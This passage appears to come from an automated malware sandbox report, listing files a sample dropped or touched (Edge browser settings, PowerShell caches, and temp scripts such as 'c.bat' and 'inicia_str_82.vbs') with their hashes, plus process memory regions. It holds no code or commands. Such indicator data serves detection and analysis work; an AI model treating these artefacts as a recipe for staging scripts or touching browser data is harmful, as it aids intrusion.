                                                SHA512

                                                a65c14daafdf55b2178dd6ad90dd1bb2a2f06eb7d398ffab17ea2ee828c9bca3e5373cacee64f545c86da2a652858697d43260542d87d8d319a1a6ff4d41c0aa

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                Filesize

                                                6KB

                                                MD5

                                                de17dc3d900b2a10a33792584f0c0d4d

                                                SHA1

                                                a490d39b068df6523ce3d90232676d055fce33c4

                                                SHA256

                                                4f4f071a75e408defa83b3ae261ece7c05df7451606b899649289190887699da

                                                SHA512

                                                04263da0a6ed374eb9160ac0d2edb0a74c959468591e526cae0f2f56a3ce4a46add1fd7fddad38730edb62d05b9af90175608ab08fe92896c9f6dc31ef499d97

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                Filesize

                                                6KB

                                                MD5

                                                40f1fc03d89a24fe3381dff20c8bfc95

                                                SHA1

                                                1748e12c20617fef4551d86465ac2fc6f565757c

                                                SHA256

                                                bc0786ba996a01156e353dbc1db328eb5ff5d55587900c903fdc49d54df1aa58

                                                SHA512

                                                44fc695b1b7959291603310e701031c3c755505a2f8570272125093225b77c1bcab6eb6cd5ce5d211b4ed83e8685f113e134f16c005317bfe1c729dc7623a8bc

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                Filesize

                                                16B

                                                MD5

                                                46295cac801e5d4857d09837238a6394

                                                SHA1

                                                44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                SHA256

                                                0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                SHA512

                                                8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                Filesize

                                                16B

                                                MD5

                                                206702161f94c5cd39fadd03f4014d98

                                                SHA1

                                                bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                SHA256

                                                1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                SHA512

                                                0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                Filesize

                                                11KB

                                                MD5

                                                5ce0ddd7bb4e61d994d77aea6ed5a84b

                                                SHA1

                                                546c56704d65af52def298c1170636d14f11c9dc

                                                SHA256

                                                d94c1141fba35b7ca78365702f156e889874cda0cba3274779cffce381e6a896

                                                SHA512

                                                12d701e606765c6091849e1edeee7a304791dd68b5559b7266459df6cd366876a5da83b99d3e4dd97a7267c2a73324c80f50695764375348660ee09c6e8e3dbf

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                Filesize

                                                10KB

                                                MD5

                                                a2d49733485ed6e7b4c3d1c8ae01dee2

                                                SHA1

                                                ed77af9b3112b49176e026253f0663f1b8b6d354

                                                SHA256

                                                fddb6da2455df3cd456fe5389a3880bead5536afc493eb7a82cad3e8234ae95e

                                                SHA512

                                                efbf2a6a06ef26752ad5c0ca606c2e3ec59a9291e99bf2561c8ff0f192bab7cdc25611b2e463e4296467f86ae53bf859962d6fb6bcc1075e3447a42c4bf0c1ee

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                Filesize

                                                53KB

                                                MD5

                                                3337d66209faa998d52d781d0ff2d804

                                                SHA1

                                                6594b85a70f998f79f43cdf1ca56137997534156

                                                SHA256

                                                9b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd

                                                SHA512

                                                8bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                15KB

                                                MD5

                                                a7ce9f26a0daec5170d0f788cc7d5665

                                                SHA1

                                                dcf3e4afae76ac73cd0d49032b1cfacbba917a8d

                                                SHA256

                                                e106460fab734ecab28fb0c4eba28a9a1e1f57e41285b553346b421a493e81a2

                                                SHA512

                                                eb8417494a1afabdd9211aa834f78ef1999c34fa5fc54403f1d249fa89abc048394714e64be2878c8afc29902786552d07298e1aef66858d20d694f3ad35bd63

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                16KB

                                                MD5

                                                28358b5f602d58eda40e9cbff22eef3d

                                                SHA1

                                                6ae64d379dd617e049a75b0b2548a5032416b8ef

                                                SHA256

                                                2c1214840c51765ef72566bf2f72d2715ba3b6b5c2435dd095c1d6ff901d8df1

                                                SHA512

                                                0c5cdf35dfa9338dc1df8d8adf681b60ae06c98d91a32b29e9ee884c5e7188a341851313b5224503fab3f93284b4515287b67d55c7d8aaf0280519032695b559

                                              • C:\Users\Admin\AppData\Local\Temp\8922_output.vbs

                                                Filesize

                                                679KB

                                                MD5

                                                6d8863a06de167baf1d964c299b78c1f

                                                SHA1

                                                9a97a39740dd30735204826025d44067bf857e96

                                                SHA256

                                                f656ad6a7ccb3c9300f282d4ce45f0162a67725c663e72587079e8900e856da8

                                                SHA512

                                                0dc0930967fbe3454320be7efd4f50b6adb86e3aea4c3734f8a1fec4b59686a06e25063cfee3b9f550c7c3f5ca85f43c14ad9f988167be270f7ee2755d3beb63

                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nongdcc4.fi2.ps1

                                                Filesize

                                                60B

                                                MD5

                                                d17fe0a3f47be24a6453e9ef58c94641

                                                SHA1

                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                SHA256

                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                SHA512

                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                              • C:\Users\Admin\AppData\Local\Temp\c.bat

                                                Filesize

                                                676KB

                                                MD5

                                                b13b4f23bfa5364f3f7a2c6b6bf733ec

                                                SHA1

                                                c9fa8337529d5e62102090ff18c0ea85e41b5921

                                                SHA256

                                                30b118ce5e91b1cae210b8bfd48ab518bb596558cb4800a6943e10a52ec493d1

                                                SHA512

                                                c782bcb73c1e0ab91711a2e1385c52379d6febb97971ce43e3b637f19de9f784905885aa3aa0a25dece00a27a33fa09cf372fd5483cb783b85d42a411890bfdc

                                              • C:\Users\Admin\AppData\Roaming\inicia_str_82.vbs

                                                Filesize

                                                113B

                                                MD5

                                                2fc0ebc4a38add0f3ad61d3ea091059e

                                                SHA1

                                                24496075ed8084d984adf9c0c9f49b9e213706f3

                                                SHA256

                                                6cc9aed3ea4f6ef888df6994703e17d26b559ede0da6b13a85f1178fe7b98bfb

                                                SHA512

                                                0047c7d2bbf38aad0ea44134b55de21a0f2f4fd538c98ae630102ca532834c2151b7f55ece4251e8f68af00ceb62b773366374dcc40efd0d82fc4fac34296dc1

                                              • memory/512-245-0x0000000008080000-0x00000000086FA000-memory.dmp

                                                Filesize

                                                6.5MB

                                              • memory/512-244-0x0000000006A30000-0x0000000006A74000-memory.dmp

                                                Filesize

                                                272KB

                                              • memory/512-243-0x0000000006670000-0x00000000066BC000-memory.dmp

                                                Filesize

                                                304KB

                                              • memory/512-233-0x0000000005FE0000-0x0000000006334000-memory.dmp

                                                Filesize

                                                3.3MB

                                              • memory/1016-224-0x0000000006680000-0x000000000669E000-memory.dmp

                                                Filesize

                                                120KB

                                              • memory/1016-210-0x00000000050A0000-0x00000000050D6000-memory.dmp

                                                Filesize

                                                216KB

                                              • memory/1016-228-0x0000000006BB0000-0x0000000006BD2000-memory.dmp

                                                Filesize

                                                136KB

                                              • memory/1016-226-0x0000000006BE0000-0x0000000006C76000-memory.dmp

                                                Filesize

                                                600KB

                                              • memory/1016-225-0x00000000066B0000-0x00000000066FC000-memory.dmp

                                                Filesize

                                                304KB

                                              • memory/1016-223-0x0000000006060000-0x00000000063B4000-memory.dmp

                                                Filesize

                                                3.3MB

                                              • memory/1016-213-0x0000000005F80000-0x0000000005FE6000-memory.dmp

                                                Filesize

                                                408KB

                                              • memory/1016-212-0x0000000005EE0000-0x0000000005F02000-memory.dmp

                                                Filesize

                                                136KB

                                              • memory/1016-211-0x0000000005770000-0x0000000005D98000-memory.dmp

                                                Filesize

                                                6.2MB

                                              • memory/1016-227-0x0000000006B60000-0x0000000006B7A000-memory.dmp

                                                Filesize

                                                104KB

                                              • memory/2928-204-0x0000000007280000-0x000000000729E000-memory.dmp

                                                Filesize

                                                120KB

                                              • memory/2928-203-0x0000000005D40000-0x0000000005D4C000-memory.dmp

                                                Filesize

                                                48KB

                                              • memory/2928-202-0x00000000072D0000-0x0000000007346000-memory.dmp

                                                Filesize

                                                472KB

                                              • memory/2928-198-0x0000000000930000-0x0000000000942000-memory.dmp

                                                Filesize

                                                72KB

                                              • memory/2928-351-0x00000000061D0000-0x0000000006262000-memory.dmp

                                                Filesize

                                                584KB

                                              • memory/2928-350-0x0000000005830000-0x0000000005840000-memory.dmp

                                                Filesize

                                                64KB

                                              • memory/2928-199-0x0000000005C50000-0x0000000005CEC000-memory.dmp

                                                Filesize

                                                624KB

                                              • memory/2928-200-0x00000000062A0000-0x0000000006844000-memory.dmp

                                                Filesize

                                                5.6MB

                                              • memory/2928-201-0x0000000005D60000-0x0000000005DC6000-memory.dmp

                                                Filesize

                                                408KB

                                              • memory/3832-325-0x0000000007160000-0x00000000071E4000-memory.dmp

                                                Filesize

                                                528KB

                                              • memory/5860-305-0x0000000007990000-0x000000000799A000-memory.dmp

                                                Filesize

                                                40KB

                                              • memory/5860-306-0x0000000007B10000-0x0000000007B21000-memory.dmp

                                                Filesize

                                                68KB

                                              • memory/5860-304-0x0000000007820000-0x00000000078C3000-memory.dmp

                                                Filesize

                                                652KB

                                              • memory/5860-303-0x0000000006B90000-0x0000000006BAE000-memory.dmp

                                                Filesize

                                                120KB

                                              • memory/5860-293-0x00000000700F0000-0x000000007013C000-memory.dmp

                                                Filesize

                                                304KB

                                              • memory/5860-292-0x00000000075B0000-0x00000000075E2000-memory.dmp

                                                Filesize

                                                200KB

                                              • memory/5960-281-0x0000000006FB0000-0x0000000007034000-memory.dmp

                                                Filesize

                                                528KB

                                              • memory/5960-280-0x0000000002660000-0x0000000002668000-memory.dmp

                                                Filesize

                                                32KB